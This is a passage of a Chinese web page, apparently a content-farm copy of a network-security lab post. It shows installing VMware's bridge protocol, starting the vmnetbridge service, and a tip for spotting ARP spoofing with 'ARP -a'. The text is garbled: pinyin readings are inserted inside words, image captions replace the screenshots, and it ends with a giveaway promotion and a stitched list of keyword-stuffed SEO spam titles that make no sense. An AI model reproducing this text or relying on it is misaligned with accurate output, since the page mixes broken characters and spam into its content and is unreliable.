          網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_python_61

          點擊安裝后,選中服務(wù),點擊添加

          網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_linux_62

          然后選擇從磁盤安裝,跳出來一個界面選擇瀏覽,在VMvare根目錄下找到?netbridge.inx文件

          網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_網(wǎng)絡(luò)安全技術(shù)pat實驗_63

          安裝即可。

          安裝完畢后,此時物理網(wǎng)卡-屬性中應(yīng)該有 “VMWare Bridge protocol” 選項,打勾即可。

          還需要啟動 vmnet bridging 驅(qū)動,管理員打開命令行:net start vmnetbridge,或者重啟計算機(jī)自動開啟。

          安全貼士

          如何知道自己是否被 ARP欺騙攻擊了?

          在命令行窗口內(nèi)輸入?ARP -a?查看路由表,如果發(fā)現(xiàn)你的網(wǎng)關(guān)的 Mac 地址,和局域網(wǎng)內(nèi)某臺主機(jī)的 Mac 地址相同,就說明你被欺騙了。

          網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_linux_64

          最后感謝每一個認(rèn)真閱讀我文章的人,禮尚往來總是要有的,雖然不是什么很值錢的東西,如果你用得到的話可以直接拿走:

          上述所有都有配套的資料,這些資料,對于做【網(wǎng)絡(luò)安全】的朋友來說應(yīng)該是最全面最完整的備戰(zhàn)倉庫,這個倉庫也陪伴我走過了最艱難的路程,希望也能幫助到你!凡事要趁早,特別是技術(shù)行業(yè),一定要提升技術(shù)功底。

          http://www.risenshineclean.com/news/23033.html

          相關(guān)文章:

        • 北京軟件開發(fā)公司排紹興seo
        • 外貿(mào)soho 網(wǎng)站建設(shè)熱狗網(wǎng)站排名優(yōu)化外包
        • 學(xué)做軟件的網(wǎng)站谷歌瀏覽器免費入口
        • 企業(yè)做網(wǎng)站需要花多少錢搜索引擎seo關(guān)鍵詞優(yōu)化效果
        • 怎么做網(wǎng)站生意線上宣傳渠道有哪些
        • 商丘網(wǎng)站制作軟件西安seo外包優(yōu)化
        • 豐臺網(wǎng)站制作營銷網(wǎng)站定制
        • 如何找人幫我做網(wǎng)站推廣網(wǎng)絡(luò)輿情監(jiān)測系統(tǒng)軟件
        • 公司做網(wǎng)站合肥網(wǎng)站制作推廣
        • 期刊網(wǎng)站建設(shè)湘潭網(wǎng)頁設(shè)計
        • 什么網(wǎng)站做ppt模板百度電話號碼查詢平臺
        • 盧灣企業(yè)微信網(wǎng)站制作seo實戰(zhàn)密碼在線閱讀
        • 手機(jī)網(wǎng)站設(shè)計案濟(jì)南百度快照推廣公司
        • 基礎(chǔ)建設(shè)龍頭股seo做的比較牛的公司
        • 網(wǎng)站效果圖怎么做seo查詢愛站
        • 怎么申請免費企業(yè)郵箱賬號上海優(yōu)化公司有哪些
        • 服務(wù)專業(yè)建設(shè)武漢官網(wǎng)優(yōu)化公司
        • 做網(wǎng)站費用多少錢域名解析ip地址
        • 小熊源碼網(wǎng)新網(wǎng)站百度seo如何做
        • 建設(shè)招標(biāo)網(wǎng)網(wǎng)站網(wǎng)站關(guān)鍵詞優(yōu)化網(wǎng)站推廣
        • 自己做網(wǎng)站 搜索功能開發(fā)杭州網(wǎng)站seo優(yōu)化
        • 滄州手機(jī)建站哪家好濟(jì)南seo外包服務(wù)
        • dw做網(wǎng)站怎么設(shè)置頁面音樂網(wǎng)站大全軟件下載
        • 公司主頁怎么填寫seo軟件哪個好
        • 出國勞務(wù)信息網(wǎng)seo優(yōu)化網(wǎng)站源碼
        • 做公司網(wǎng)站需要服務(wù)器嗎上海關(guān)鍵詞排名提升
        • 一學(xué)一做短視頻網(wǎng)站杭州市優(yōu)化服務(wù)
        • 重慶網(wǎng)站空間鍵詞排名搜索引擎優(yōu)化的定義
        • 廣州各區(qū)優(yōu)化疫情防控措施seo引擎優(yōu)化公司
        • 做任務(wù)的獎金網(wǎng)站國際實時新聞